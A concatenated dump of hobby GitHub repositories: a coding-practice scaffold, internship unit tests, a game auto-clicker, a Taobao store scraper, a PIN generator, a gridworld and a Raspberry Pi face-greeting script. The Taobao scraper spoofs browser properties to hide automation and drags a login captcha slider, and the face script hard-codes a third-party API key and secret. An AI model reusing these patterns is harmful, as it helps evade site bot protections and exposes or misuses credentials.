"length_bytes": 582,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 27,
"path": "/tools/quick-coding-practice-setup.py",
"repo_name": "roryxr/CodingPractice",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport sys\nimport os\nimport stat\n\nif len(sys.argv) < 2:\n sys.exit('Usage: %s <directory-name>' % sys.argv[0])\n\ndir_path = sys.argv[1]\nif not os.path.exists(dir_path):\n os.makedirs(dir_path);\nelse:\n sys.exit('Directory %s already exists' % dir_path)\n\nf = open(dir_path + '/Solution.java', 'w')\nf.write('public class Solution {\\n\\n}')\nf.close()\n\nf = open(dir_path + '/run', 'w')\nf.write('#!/bin/bash\\n')\nf.write('javac Solution.java\\n')\nf.write('java Solution\\n')\nf.close()\n\nst = os.stat(dir_path + '/run')\nos.chmod(dir_path + '/run', st.st_mode | stat.S_IEXEC)\n"
}
] | 2 |
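The setup script above scaffolds a problem directory with `os`, `open`, and a manual chmod. The same steps fit naturally into `pathlib`; a sketch of an equivalent scaffold (same file contents and executable bit as the original):

import stat
from pathlib import Path

def scaffold(dir_name):
    d = Path(dir_name)
    d.mkdir(parents=True, exist_ok=False)          # fail loudly if it already exists
    (d / "Solution.java").write_text("public class Solution {\n\n}")
    run = d / "run"
    run.write_text("#!/bin/bash\njavac Solution.java\njava Solution\n")
    run.chmod(run.stat().st_mode | stat.S_IEXEC)   # mark the run script executable

# scaffold("Q123")  # hypothetical problem directory name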
ishitavarshney/insidesherpaJP | https://github.com/ishitavarshney/insidesherpaJP | 67be3bb9d30f13e33fa36166c93e3b77da299189 | 918ab751c05322f178dead0084db215dd8320ba8 | 281fdefb15a153b24d0cadabe8c8f59834f95e92 | refs/heads/main | 2023-01-13T06:46:03.545227 | 2020-11-08T17:35:55 | 2020-11-08T17:35:55 | 311,117,214 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4460492730140686,
"alphanum_fraction": 0.5739167332649231,
"avg_line_length": 48.04166793823242,
"blob_id": "d9e8c93248c6f72cb441688ac5db73cf1bd9c379",
"content_id": "ba8a5410a7583b7a802bf06f28d9069f8e4c3bc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2354,
"license_type": "no_license",
"max_line_length": 174,
"num_lines": 48,
"path": "/client_test.py",
"repo_name": "ishitavarshney/insidesherpaJP",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom client3 import getDataPoint,getRatio\n\nclass ClientTest(unittest.TestCase):\n def test_getDataPoint_calculatePrice(self):\n quotes = [\n {'top_ask': {'price': 121.2, 'size': 36}, 'timestamp': '2019-02-11 22:06:30.572453', 'top_bid': {'price': 120.48, 'size': 109}, 'id': '0.109974697771', 'stock': 'ABC'},\n {'top_ask': {'price': 121.68, 'size': 4}, 'timestamp': '2019-02-11 22:06:30.572453', 'top_bid': {'price': 117.87, 'size': 81}, 'id': '0.109974697771', 'stock': 'DEF'}\n ]\n for q in quotes:\n self.assertEqual(getDataPoint(q),[q['stock'],q['top_bid']['price'],q['top_ask']['price'],(q['top_bid']['price']+q['top_ask']['price'])/2])\n\n def test_getDataPoint_calculatePriceBidGreaterThanAsk(self):\n quotes = [\n {'top_ask': {'price': 119.2, 'size': 36}, 'timestamp': '2019-02-11 22:06:30.572453', 'top_bid': {'price': 120.48, 'size': 109}, 'id': '0.109974697771', 'stock': 'ABC'},\n {'top_ask': {'price': 121.68, 'size': 4}, 'timestamp': '2019-02-11 22:06:30.572453', 'top_bid': {'price': 117.87, 'size': 81}, 'id': '0.109974697771', 'stock': 'DEF'}\n ]\n \"\"\" ------------ Add the assertion below ------------ \"\"\"\n for q in quotes:\n self.assertEqual(getDataPoint(q),[q['stock'],q['top_bid']['price'],q['top_ask']['price'],(q['top_bid']['price']+q['top_ask']['price'])/2])\n\n def test_getDataPoint_calculatePriceBidLesserThanAsk(self):\n quotes = [\n {'top_ask': {'price': 119.2, 'size': 36}, 'timestamp': '2019-02-11 22:06:30.572453', 'top_bid': {'price': 112.53, 'size': 109}, 'id': '0.109974697771', 'stock': 'ABC'},\n {'top_ask': {'price': 121.68, 'size': 4}, 'timestamp': '2019-02-11 22:06:30.572453', 'top_bid': {'price': 117.87, 'size': 81}, 'id': '0.109974697771', 'stock': 'DEF'}\n ]\n \"\"\" ------------ Add the assertion below ------------ \"\"\"\n for q in quotes:\n self.assertEqual(getDataPoint(q),[q['stock'],q['top_bid']['price'],q['top_ask']['price'],(q['top_bid']['price']+q['top_ask']['price'])/2])\n\n\n\n \"\"\" ------------ Add more unit tests ------------ \"\"\"\n def test_getRatio(self):\n price_a=119.34\n price_b=120.72\n self.assertEqual(getRatio(price_a,price_b),price_a/price_b)\n\n def test_getRatioWhenDenominatorIs0(self):\n price_a=120.32\n self.assertEqual(getRatio(price_a,0.0),None)\n\n \n\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
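The test module imports `getDataPoint` and `getRatio` from `client3`, which is not included in this dump. A minimal implementation consistent with the assertions above might look like the following; this is only one sketch that satisfies these tests, not necessarily the exercise's reference version.

def getDataPoint(quote):
    # Produce [stock, bid_price, ask_price, mid_price] for one quote dictionary.
    stock = quote["stock"]
    bid = quote["top_bid"]["price"]
    ask = quote["top_ask"]["price"]
    return [stock, bid, ask, (bid + ask) / 2]

def getRatio(price_a, price_b):
    # Guard the division the way the zero-denominator test expects.
    if price_b == 0:
        return None
    return price_a / price_b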
{
"alpha_fraction": 0.8714285492897034,
"alphanum_fraction": 0.8714285492897034,
"avg_line_length": 34,
"blob_id": "0ed261a5245b142b80833303c0c643063f4df28d",
"content_id": "d0f9459747277212eb5668126db864c792662ced",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 70,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ishitavarshney/insidesherpaJP",
"src_encoding": "UTF-8",
"text": "# insidesherpaJP\nInsidesherpa JP Morgan virtual internship experience\n"
}
] | 2 |
abdazmi/Stick-Hero-Automated | https://github.com/abdazmi/Stick-Hero-Automated | d9e94783d1a42ed9dda47f4141f176fecdd1dfa2 | d1c11b6d27029a360071494270f27bbdbd815f41 | 93597b6a88954c4d346b02afd0909254565d7cdb | refs/heads/main | 2023-06-19T00:29:15.596956 | 2021-07-10T23:11:14 | 2021-07-10T23:11:14 | 381,467,598 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5516709685325623,
"alphanum_fraction": 0.6041131019592285,
"avg_line_length": 26.785715103149414,
"blob_id": "4704b5030ae584f965a1abcf2ff965d514a08e78",
"content_id": "91fc8124543ee628d6225c3f95bc81b400058e59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1945,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 70,
"path": "/main.py",
"repo_name": "abdazmi/Stick-Hero-Automated",
"src_encoding": "UTF-8",
"text": "from pprint import pprint\nfrom time import sleep\nimport keyboard\nimport win32api\nimport win32con\nimport pyautogui\n\n\n# https://www.silvergames.com/en/stick-hero\n\n# RGB for hill: ( 41, 29, 20)\n# 1 start of screen X: 752 Y: 776\n# 2 end of screen X: 1165 Y: 776\n\n# starting point of the game screen\nx = 752\ny = 776\n# width = 1165 - 752\nwidth = 413\n\nwhile keyboard.is_pressed('q') == False:\n pyautogui.FAILSAFE = True\n sleep(2)\n all_colors = []\n for ww in range(width):\n try:\n r, g, b = pyautogui.pixel(x + ww, y)\n all_colors.append([r, g, b])\n except:\n continue\n # pprint(all_colors)\n\n to_split = {}\n for i, j in enumerate(all_colors):\n r, g, b = j\n if r == 41 and g == 29 and b == 20:\n to_split.update({i: j})\n pprint(to_split)\n\n starting_index = int(list(to_split.keys())[0])\n first_cliff = None\n next_cliff = None\n for key in to_split:\n if int(key) == starting_index:\n starting_index += 1\n first_cliff = (key, to_split[key])\n else:\n next_cliff = (key, to_split[key])\n break\n print(first_cliff)\n print(next_cliff)\n\n first_cliff_width = first_cliff[0] - int(list(to_split.keys())[0])\n space_in_between = int(next_cliff[0]) - int(first_cliff[0])\n second_cliff_width = int(list(to_split.keys())[-1]) - int(next_cliff[0])\n stick_length = space_in_between + (second_cliff_width / 2)\n\n print(first_cliff_width)\n print(space_in_between)\n print(second_cliff_width)\n print(stick_length)\n\n pyautogui.moveTo(950, 415)\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0)\n sleep(space_in_between * 0.0032 + second_cliff_width * 0.0009)\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 0)\n\n # pyautogui.mouseDown(x=950, y=415, button='left')\n # sleep(space_in_between*0.0027)\n # pyautogui.mouseUp(x=950, y=415, button='left')\n"
},
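The sleep duration in the script above converts a pixel gap into a mouse-hold time using two magic constants. Pulling that into a named linear calibration makes the tuning explicit; the coefficients below are the script's own empirical values and are valid only for that screen size and zoom level.

GAP_SECONDS_PER_PIXEL = 0.0032      # time contributed by the gap between cliffs
CLIFF_SECONDS_PER_PIXEL = 0.0009    # extra time to reach the middle of the far cliff

def hold_time(space_in_between, second_cliff_width):
    # Linear model: the stick grows at a constant rate, so time scales with distance.
    return (space_in_between * GAP_SECONDS_PER_PIXEL
            + second_cliff_width * CLIFF_SECONDS_PER_PIXEL)

print(hold_time(120, 60))  # e.g. ~0.438 s for a 120 px gap and a 60 px far cliff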
{
"alpha_fraction": 0.714031994342804,
"alphanum_fraction": 0.7850799560546875,
"avg_line_length": 45.91666793823242,
"blob_id": "f3dc6be01f77fb225a94d68196217ba7a7c25aed",
"content_id": "9adde76db509b9b356891e4c17b549cf117d8a97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 563,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 12,
"path": "/README.md",
"repo_name": "abdazmi/Stick-Hero-Automated",
"src_encoding": "UTF-8",
"text": "# Stick-Hero-Automated\nin order to play this game you need to \n1.open the game on this link below:\nhttps://www.silvergames.com/en/stick-hero\n\n2.then press play button (NOTE: it is important to put you browser on full screen before running the code)\n\n3.then press start\n4.after that you can run the code and flip your screen immoderately back to the game and enjoy watching>\n(NOTE:you should stay on the same game page while the code is running)\n\n\n"
}
] | 2 |
kskan/taobaoreptile | https://github.com/kskan/taobaoreptile | edaef94d3cadc41cfaf30c2980c79f0e4938908a | a4d1fb1257712f021c6d3b13eced11890a782492 | d3e5521e56850c330634c007f552c6ce642250e6 | refs/heads/master | 2022-12-13T11:49:47.701945 | 2020-09-11T09:13:23 | 2020-09-11T09:13:23 | 293,715,037 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5730522871017456,
"alphanum_fraction": 0.5866914391517639,
"avg_line_length": 34.829627990722656,
"blob_id": "4550d8e8289eaf2273db51a885759329b71465a4",
"content_id": "c4c3b5506d7a31366eb98e4b0ba549d7740ec19a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5496,
"license_type": "no_license",
"max_line_length": 206,
"num_lines": 135,
"path": "/app.py",
"repo_name": "kskan/taobaoreptile",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\nimport re\nimport csv\nimport os,sys\n\ndef app_path():\n \"\"\"Returns the base application path.\"\"\"\n if hasattr(sys, 'frozen'):\n # Handles PyInstaller\n return os.path.dirname(sys.executable) # 使用pyinstaller打包后的exe目录\n return os.path.dirname(__file__)\n\ndef createcsv():\n global tabel\n path = app_path()+\"/taobao.csv\"\n with open(path, 'w') as f:\n csv_write = csv.writer(f)\n csv_head = [\"id\",\"bigimg\",\"title\",\"price\",\"longimg\"]\n csv_write.writerow(csv_head)\n\ndef write_csv(data_row):\n path = app_path()+\"/taobao.csv\"\n with open(path,'a+') as f:\n csv_write = csv.writer(f)\n csv_write.writerow(data_row)\n\n\ndef is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n pass\n\n try:\n import unicodedata\n unicodedata.numeric(s)\n return True\n except (TypeError, ValueError):\n pass\n\n return False\n\nif __name__ == '__main__':\n # 登陆密码和账号\n print(\"——————————————欢迎使用商品爬虫————————————————\")\n print(\"1.本系统适用于现在用户在商品于兽次元商品同步问题,代码完全开源,但是请勿对其他友商进行攻击或者窃取,本系统一概不负责\")\n print(\"2.使用本系统确保您的机子有Chrome85版本,且现在已经登陆淘宝账号(稍后爬虫需要使用)\")\n print(\"3.请前往您自己的商品,所有分类(xxxxx.taobao.com/search.htm),(爬虫数据)\")\n print(\"4.爬虫中会出现chrome来回切换,请勿手动关闭,爬虫完毕会自动关闭\")\n print(\"5.爬虫完毕,后期就会出现csv文件,请从兽次元后台继续操作\")\n print(\"——————————————点击回车继续————————————————\")\n input()\n print('请输入(淘宝)账号:')\n username = input()\n print('请输入(淘宝)密码:')\n passworld = input()\n print('请输入您的店铺搜索页面:')\n url = input()\n #启动浏览器\n driver = webdriver.Chrome(executable_path=app_path()+\"/chromedriver.exe\")\n driver.maximize_window()\n driver.get(\n 'https://login.taobao.com/member/login.jhtml?redirectURL=http%3A%2F%2Ftrade.taobao.com%2Ftrade%2Fitemlist%2Flist_sold_items.htm%3Fspm%3Da313o.201708ban.category.d28.64f0197aAFB4S5%26mytmenu%3Dymbb')\n js1 = '''Object.defineProperties(navigator,{ webdriver:{ get: () => false } }) '''\n js2 = '''window.navigator.chrome = { runtime: {}, }; '''\n js3 = '''Object.defineProperty(navigator, 'languages', { get: () => ['en-US', 'en'] }); '''\n js4 = '''Object.defineProperty(navigator, 'plugins', { get: () => [1, 2, 3, 4, 5,6], }); '''\n driver.execute_script(js1)\n driver.execute_script(js2)\n driver.execute_script(js3)\n driver.execute_script(js4)\n js = \"\"\"\n document.getElementById('fm-login-id').value='{0}';\n document.getElementById('fm-login-password').value='{1}';\n document.getElementsByClassName('fm-submit')[0].click()\n \"\"\".format(username, passworld)\n driver.execute_script(js)\n try:\n element = driver.find_element_by_id('nc_1__scale_text')\n ActionChains(driver).drag_and_drop_by_offset(element, 400, 0).perform()\n time.sleep(2)\n driver.execute_script(js)\n except:\n print('无滑块')\n pass\n driver.get(url)\n # 检查页数\n pagesize = 1\n createcsv()\n # 正在查找页数\n print(\"正在查找页数\")\n pagelist = driver.find_elements_by_class_name(\"J_SearchAsync\")\n for page in pagelist:\n if is_number(page.text) and pagesize<int(page.text) :\n pagesize = int(page.text)\n for index in range(1,pagesize+1):\n print(\"现在页数:\"+str(index))\n if index is not 1:\n driver.get(url+\"?pageNo=\"+str(index))\n item = driver.find_elements_by_class_name(\"item\")\n dict = {}\n for data in item:\n datatext=data.get_attribute(\"innerHTML\")\n p= re.compile(r\"\\\"\\/\\/item.taobao.com\\/item\\.htm\\?id=(.*?)\\\"\")\n numbers= p.findall(datatext)\n def check(numbers):\n for one in numbers:\n p1 = re.compile(r\"([&][^&]+)$\")\n one = p1.sub(\"\", one)\n return one\n 
dict[check(numbers)]=None;\n for a in dict:\n csvlist = []\n print(\"正在获取:\"+a)\n driver.get(\"https://item.taobao.com/item.htm?id=\"+a)\n #获取大图\n image = driver.find_element_by_id(\"J_ImgBooth\")\n bigsrc = image.get_attribute(\"src\")\n title = driver.find_element_by_class_name(\"tb-main-title\")\n titlename = title.get_attribute(\"data-title\")\n price = driver.find_element_by_class_name(\"tb-rmb-num\").get_attribute(\"innerHTML\")\n csvlist.append(str(a))\n csvlist.append(bigsrc)\n csvlist.append(titlename)\n csvlist.append(price)\n longimglist = driver.find_element_by_id(\"J_DivItemDesc\")\n longimglist = longimglist.find_elements_by_tag_name(\"img\")\n for longimg in longimglist:\n csvlist.append(longimg.get_attribute(\"src\"))\n write_csv(csvlist)\n driver.close()\n print(\"数据爬虫完毕\")\n\n\n"
}
] | 1 |
paradoxmiller/PIN-Generator | https://github.com/paradoxmiller/PIN-Generator | 7a2f8d987c351c66b44356bf16c8ac5100e9b9d9 | 507e8dcd1bd4392b4e8af58fbfbb35abe0ee91ed | b4fe2beac39d6e2d1fc97e70e61f5f0ab7c4b028 | refs/heads/master | 2020-03-17T03:47:30.918250 | 2018-05-13T15:38:20 | 2018-05-13T15:38:20 | 133,250,505 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6501767039299011,
"alphanum_fraction": 0.7040635943412781,
"avg_line_length": 33.30303192138672,
"blob_id": "ea14b0b39b8ce129e0e7e85157794004aafe631f",
"content_id": "544d8ab8734463e7f0e0a01d21d6892a0aa2cb2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1132,
"license_type": "no_license",
"max_line_length": 258,
"num_lines": 33,
"path": "/pingen.py",
"repo_name": "paradoxmiller/PIN-Generator",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nfrom tkinter import Tk, Label, Button\nimport os\nimport random\n\nclass PINGEN:\n\tdef __init__(self, master):\n\t\tself.master = master\n\t\tmaster.title(\"PIN Generator\")\n\n\t\tself.label = Label(master, text=\"Would you like to create a new PIN?\", font = \"Courier 20 bold\")\n\t\tself.label.pack()\n\n\t\tself.greet_button = Button(master, text=\"Generate PIN\", bg=\"#909090\",fg='red', font = \"Courier 16 bold\", padx=5, pady=5, highlightbackground='#555555',activeforeground='red',activebackground='orange',width=\"20\", relief=\"raised\", bd=\"6\", command=self.greet)\n\t\tself.greet_button.pack()\n\n\t\tself.close_button = Button(master, text=\"Exit\", bg=\"#959595\", fg='green', font = \"Courier 16 bold\", padx=5, pady=5,highlightbackground='#555555',activeforeground='green',activebackground='orange', width=\"20\", relief=\"raised\", bd=\"6\", command=master.quit)\n\t\tself.close_button.pack()\n\n\n\tdef greet(self):\n\t\tos.system('clear')\n\t\tprint(\"Generating new PIN now...\")\n\t\tmypin = random.randrange(1000,9999)\n\t\tprint(mypin)\n\n\nroot = Tk()\nmy_gui = PINGEN(root)\nroot.title(\"Four digit PIN generator\")\nroot.geometry(\"575x150+250+225\")\nroot.mainloop()\n"
},
{
"alpha_fraction": 0.7634408473968506,
"alphanum_fraction": 0.774193525314331,
"avg_line_length": 45.5,
"blob_id": "0c62636122a891832501ff033e38667ebf9874f3",
"content_id": "79ffd02ed245caa31c20929267dceef9cf4e9605",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 2,
"path": "/README.md",
"repo_name": "paradoxmiller/PIN-Generator",
"src_encoding": "UTF-8",
"text": "# PIN-Generator\nThis is a simple gui for generating a random 4 digit PIN I made just for fun\n"
}
] | 2 |
aztecman/Move37 | https://github.com/aztecman/Move37 | 31cdb9b8296a170c1d602714de46ea59c2850e51 | 9c38a9f6af243442ee07f234f98d800d1b7bbf72 | c91212736998229c303f570b6a47bd5f9537063e | refs/heads/master | 2020-03-28T17:56:34.071741 | 2018-09-27T00:02:23 | 2018-09-27T00:02:23 | 148,837,905 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6393182873725891,
"alphanum_fraction": 0.6535869836807251,
"avg_line_length": 27.670454025268555,
"blob_id": "c22cbbc34ce536857f8da1a9b553e531273fcd0b",
"content_id": "c1d448f846cdef48a265aa2623e92e7843987295",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2523,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 88,
"path": "/Documents/Move37/GridWorld101.py",
"repo_name": "aztecman/Move37",
"src_encoding": "UTF-8",
"text": "import pygame, sys\nfrom pygame.locals import *\n\n# TODO: document the code\n# TODO: add an introductory paragraph explaining the premis ie:\n# For simplicity of explanation we are starting with a optimal policy for each state\n# OR\n# For simplicity our Agent will trace back from the terminal state\n\n# TODO: post code to GITHUB\n# TODO: add a setValue function to the cell object\n# TODO: add a \"value = _\" label to each cell within the drawCell function\n# TODO: create a icon for the agent, such as a label that says 'agent'\n# TODO: code the agent moving around with a 20% chance of slipping\n\nGREEN = (0, 204, 0)\nWHITE = (255, 255, 255)\nRED = (204, 0, 0)\nTILESIZE = 80\nTILEOFFSET = 5\nBOARDWIDTH = (TILESIZE + TILEOFFSET) * 4 + TILEOFFSET\nBOARDHEIGHT = (TILESIZE + TILEOFFSET) * 3 + TILEOFFSET + 40\n\nclass Cell:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n \n self.reward_state = False\n self.punish_state = False\n self.color = WHITE\n \n def coordinates(self):\n return self.x, self.y\n \n def drawCell(self, x_coord, y_coord):\n x_pixel = coordToPixelSpace(x_coord)\n y_pixel = coordToPixelSpace(y_coord)\n pygame.draw.rect(DISPLAYSURF, self.color, (x_pixel, y_pixel, TILESIZE, TILESIZE))\n\n def getColor(self):\n return self.color\n \n def setPunish(self):\n self.color = RED\n self.punish_state = True\n\n def setReward(self):\n self.color = GREEN\n self.reward_state = True\n \ndef coordToPixelSpace(coord):\n pixelPosition = TILEOFFSET + coord*(TILESIZE + TILEOFFSET)\n return pixelPosition\n\ndef terminate():\n pygame.quit()\n sys.exit()\n \ndef checkForQuit():\n for event in pygame.event.get(QUIT): # get all the QUIT events\n terminate() # terminate if any QUIT events are present\n for event in pygame.event.get(KEYUP): # get all the KEYUP events\n if event.key == K_ESCAPE:\n terminate() # terminate if the KEYUP event was for the Esc key\n pygame.event.post(event) # put the other KEYUP event objects back\n\n\n \ncell_list = []\nfor i in range(4):\n for j in range(3):\n cell_list.append(Cell(i, j))\n\ncell_list[9].setReward()\ncell_list[10].setPunish()\ndel cell_list[4]\n\npygame.init()\nDISPLAYSURF = pygame.display.set_mode((BOARDWIDTH, BOARDHEIGHT))\n\nfor i in range(len(cell_list)):\n cell_list[i].drawCell(cell_list[i].coordinates()[0], cell_list[i].coordinates()[1])\n\npygame.display.update()\n\nwhile True:\n checkForQuit()\n"
}
] | 1 |
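Two of the TODOs in GridWorld101.py (a setValue function and a per-cell value label) can be sketched independently of the rest of the program. One possible shape for that cell, assuming pygame's font module has been initialised (pygame.init() covers it) and using an 18 pt default font as an arbitrary choice:

import pygame

pygame.font.init()  # needed before creating any Font objects

class ValueCell:
    def __init__(self, x, y, value=0.0):
        self.x, self.y = x, y
        self.value = value

    def setValue(self, value):
        # Store the state value so policy evaluation can update it in place.
        self.value = value

    def drawLabel(self, surface, x_pixel, y_pixel):
        # Render a "value = ..." label inside the tile at the given pixel origin.
        font = pygame.font.Font(None, 18)
        label = font.render("value = %.2f" % self.value, True, (0, 0, 0))
        surface.blit(label, (x_pixel + 4, y_pixel + 4))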
alex-chan/raspalex | https://github.com/alex-chan/raspalex | 11801aa03e2289d013ad4423b166e8396061d3a6 | 2b792d1dbbf9f02f2fc9a84dfd892ac441c0ab10 | 2fd81db2313a38da5daf1290434a4446649cc236 | refs/heads/master | 2021-01-15T15:32:38.928801 | 2016-09-04T08:09:59 | 2016-09-04T08:09:59 | 64,921,353 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5400755405426025,
"alphanum_fraction": 0.5518254041671753,
"avg_line_length": 29.1645565032959,
"blob_id": "ecf3f8de0c4e277be17749c427fa56c98601de4a",
"content_id": "b63231618357f9165e528d5d64e62850516bcd28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4766,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 158,
"path": "/polite_alex.py",
"repo_name": "alex-chan/raspalex",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf8 -*-\n# filename: PoliteAlex\n# author: alexchen\n# date: 2/9/2016\n# All copyright reserved to xsunset\n# ---------------------------------\nfrom __future__ import absolute_import, division, print_function, \\\n with_statement\n\nimport time\nimport subprocess\nfrom facepp import API, File\nimport pygame\n\n\nAPI_KEY = '2d0df4c56a364d82eed3d1a238950ffb'\nAPI_SECRET = 'QovGDvkrsfOjY_ncbvT7ItprS6Af7gZZ'\napi = API(API_KEY, API_SECRET)\n\nMASTER = 'Alex'\nFRIEND = 'Lizi'\nTHREDHOLD = 30\n\nclass PoliteAlex(object):\n last_path = None\n def __init__(self):\n pygame.mixer.init()\n\n def _is_someone(regn, person_name):\n return regn['person_name'] == person_name and regn['confidence'] > THREDHOLD\n\n def capture_still_image(self):\n return \"imgs/test1.jpg\"\n t = time.strftime(\"%Y%m%d_%H%M%S\")\n path = \"imgs/%s.jpg\" % t\n popen = subprocess.Popen(['raspistill','-vf', '-w','200','-h','200','-o',path])\n ret = popen.communicate()\n return path\n\n def is_screen_changed(self, new_path, old_path):\n return True\n\n def is_somebody_in_picture(self, path):\n return True\n\n def recognize_with_facepp(self, path):\n\n # rst = api.recognition.identify(group_name = 'test', url = TARGET_IMAGE)\n rst = api.recognition.identify(group_name = 'saladgroup', img = File(path))\n print('recognition result', rst)\n print('=' * 60)\n if len(rst['face']) > 0 and len(rst['face'][0]['candidate']) > 0:\n print('The person with highest confidence:', \\\n rst['face'][0]['candidate'][0]['person_name'])\n return rst\n\n def is_only_master_in_picture(self, regn):\n if len(regn['face']) > 1 :\n return False\n\n if len(regn['face']) > 0:\n if len(regn['face'][0]['candidate']) > 0:\n return self._is_someone(regn['face'][0]['candidate'], MASTER)\n\n return False\n\n def is_friend(self, regn):\n if len(regn['face']) < 1 :\n return False\n\n faces = regn['face']\n for face in faces:\n candicates = face['candidate']\n if len(candicates) > 0 :\n return self._is_someone(candicates[0], FRIEND)\n\n return False\n\n def is_only_stranger_in_picture(self, regn):\n if len(regn['face']) < 1 :\n return False\n\n faces = regn['face']\n is_stranger = True\n for face in faces:\n candicates = face['candidate']\n if len(candicates) > 0 :\n if self._is_someone(candicates[0], MASTER) or self._is_someone(candicates[0], FRIEND):\n print('is stranger')\n is_stranger = False\n break\n\n return is_stranger\n\n def is_master_with_others(self, regn):\n if len(regn['face']) <= 1 :\n return False\n faces = regn['face']\n for face in faces:\n candicates = face['candidate']\n if len(candicates) > 0 :\n if self._is_someone(candidates[0], MASTER):\n return True\n\n return False\n\n def welcome_master_with_others(self):\n pygame.mixer.music.load(\"res/welcome_friends.ogg\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n\n def welcome_friend(self):\n pygame.mixer.music.load(\"res/welcome_friends.ogg\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n\n def welcome_master(self):\n pygame.mixer.music.load(\"res/welecomehome_master.ogg\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n\n def yield_at_stranger(self):\n pygame.mixer.music.load(\"res/yield_at_stranger.ogg\")\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy() == True:\n continue\n\n\n def run_forever(self):\n while True:\n path = self.capture_still_image()\n changed = self.is_screen_changed(path, self.last_path)\n if 
not changed:\n # Sleep\n continue\n sb = self.is_somebody_in_picture(path)\n if not sb:\n # Sleep\n continue\n\n ret = self.recognize_with_facepp(path)\n if self.is_master_with_others(ret):\n self.welcome_master_with_others()\n elif self.is_friend(ret):\n self.welcome_friend()\n elif self.is_only_master_in_picture(ret):\n self.welcome_master()\n elif self.is_only_stranger_in_picture(ret):\n self.yield_at_stranger()\n\n\nif __name__ == \"__main__\":\n alex = PoliteAlex()\n alex.run_forever()\n"
},
{
"alpha_fraction": 0.6507936716079712,
"alphanum_fraction": 0.6603174805641174,
"avg_line_length": 19.322580337524414,
"blob_id": "1253141b935fae187d27e6eedfb7214bb5cbe8b1",
"content_id": "6ce6a89a8d73f2e53d7b54c5e4ccb739c8624561",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 630,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 31,
"path": "/README.md",
"repo_name": "alex-chan/raspalex",
"src_encoding": "UTF-8",
"text": "RaspAlex - A program set that make my raspberry pi act like a baby/pet finally.\n==========================================\n\n\nPolite Alex - In progressing\n----------\n\nAlex will greet you when recognize you everyday morning/night\n\n### Hardware requirements\n1. raspberry-compatible camera\n2. loudspeaker\n\n\nHardworking Alex - TODO\n----------------\n\nAlex can help you turn on/off TV, air conditioner etc.\n\n### Hardware requirements\n1. high quality microphones.\n2. infrared LEDs\n\nNaughty Alex - TODO\n--------------------\n\nAlex can move around according to your command or self-decision.\n\n### Hardware requirements\n1. vehicles\n2. motors\n"
}
] | 2 |
hello3306/lin-cms-flask | https://github.com/hello3306/lin-cms-flask | 1b502add47a6258229fa971d08221137fbe4dd4e | db98f838323baf476cded0578df65651fb64ce74 | 86679e5c14e66aa126d27e3fc77e172a9a908f12 | refs/heads/master | 2022-12-14T00:10:54.212042 | 2019-03-08T09:32:11 | 2019-03-08T09:32:11 | 174,481,130 | 1 | 0 | MIT | 2019-03-08T06:24:52 | 2019-08-12T07:12:43 | 2022-12-08T01:40:58 | Python | [
{
"alpha_fraction": 0.668789803981781,
"alphanum_fraction": 0.6942675113677979,
"avg_line_length": 16.44444465637207,
"blob_id": "1fd98f82fd6f51c2e145db9a327119803cfe00ff",
"content_id": "06fbdb7be81d687974e23038f68cb01523378e3c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 379,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 18,
"path": "/app/config/setting.py",
"repo_name": "hello3306/lin-cms-flask",
"src_encoding": "UTF-8",
